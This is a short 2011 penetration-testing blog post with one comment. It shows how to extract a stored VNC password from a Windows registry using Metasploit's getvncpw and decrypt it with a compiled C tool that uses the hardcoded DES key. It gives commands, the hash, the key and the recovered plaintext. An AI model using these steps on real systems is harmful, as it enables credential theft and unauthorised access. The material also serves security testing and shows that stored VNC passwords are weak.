Tuesday, March 15, 2011

VNC passwords and Metasploit and DES


inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>


you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};


getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass


or use this one
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.
CG

1 comment:

mubix said...

I rewrote the script as a post module.

Info here:
http://www.room362.com/blog/2011/3/20/metasploit-vnc-password-extraction.html

Commited as of r12048
https://www.metasploit.com/redmine/projects/framework/repository/revisions/12048